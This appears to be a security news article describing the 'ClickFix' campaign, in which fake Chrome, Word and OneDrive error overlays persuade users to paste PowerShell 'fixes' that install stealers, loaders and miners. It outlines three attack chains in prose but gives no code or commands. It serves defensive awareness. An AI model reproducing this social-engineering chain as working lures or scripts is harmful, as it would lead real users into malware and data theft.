ClickFix Malware
A recent malware distribution strategy employs deceptive notifications resembling Google Chrome, Microsoft Word and OneDrive errors. These fake alerts aim to deceive users into executing threatening PowerShell 'fixes,' which ultimately install malware. This campaign has been identified and used by various threat actors, including those associated with ClearFake, a new group known as ClickFix, and the notorious TA571 threat actor. TA571 is known for its role as a spam distributor, responsible for disseminating large volumes of emails that often lead to malware and ransomware infections.
Previously, ClearFake attacks involved website overlays that tricked visitors into installing malware by posing as fake browser updates.
Table of Contents
Fake Error Alerts May Deliver Malware Threats
In the reported attacks, threat actors have expanded their methods to include JavaScript embedded in HTML attachments and compromised websites. These tactics now involve overlays that simulate fake errors from Google Chrome, Microsoft Word and OneDrive. These deceptive alerts urge visitors to click on a button to copy a PowerShell 'fix' to their clipboard, instructing them to paste and execute it either in a Run dialog or PowerShell prompt.
While this attack chain relies on significant user interaction, its social engineering is sophisticated enough to present users with what appears to be a genuine problem and solution simultaneously. This can compel users to act hastily without fully assessing the associated risks. Infosec researchers have identified several payloads used in these attacks, including DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and the Lumma Stealer.
Fraudulent Scripts Drop Malware to Users’ Devices
Analysts have identified three distinct attack chains primarily distinguished by their initial stages, with only the first not definitively linked to TA571.
In this first scenario, associated with threat actors connected to ClearFake, users visit compromised websites that load malicious scripts hosted on the blockchain via Binance's Smart Chain contracts. These scripts conduct checks and trigger fake Google Chrome alerts claiming issues with Web page display. The dialog then prompts visitors to install a 'root certificate' by copying a PowerShell script to the Windows Clipboard and executing it in a Windows PowerShell (Admin) console.
Upon execution, the PowerShell script validates the target device. It proceeds to perform actions such as flushing the DNS cache, clearing clipboard contents, displaying a distraction message and downloading a remote PowerShell script. This script, in turn, conducts anti-VM checks before initiating the download of an information-stealing payload.
ClickFix and Lure Emails Used as Alternative Attack Chains
The second attack chain is linked to the 'ClickFix' campaign, utilizing website injections on compromised sites to create an iframe overlay presenting a fake Google Chrome error. Users are directed to open 'Windows PowerShell (Admin)' and paste provided code, resulting in the same infections mentioned previously.
Another infection method involves email-based attacks using HTML attachments resembling Microsoft Word documents. Users are prompted to install the 'Word Online' extension to view the document correctly. The error message provides 'How to fix' and 'Auto-fix' options. Selecting 'How to fix' copies a base64-encoded PowerShell command to the clipboard, instructing users to paste it into PowerShell. 'Auto-fix' employs the search-ms protocol to display a WebDAV-hosted 'fix.msi' or 'fix.vbs' file from a remote attacker-controlled file share. In these instances, the PowerShell commands download and execute either an MSI file or a VBS script, leading to infections by Matanbuchus or DarkGate, respectively.
Throughout these attacks, threat actors exploit users' lack of awareness regarding the risks associated with executing PowerShell commands on their systems. They also capitalize on Windows' inability to detect and prevent the harmful actions triggered by the pasted code.
The varied attack chains observed by researchers indicate that TA571 is actively exploring diverse methods to enhance efficacy and discover additional pathways for infecting a greater number of systems. This adaptive approach underscores the cybercriminals' commitment to evolving their tactics and expanding their impact within the cybersecurity landscape.
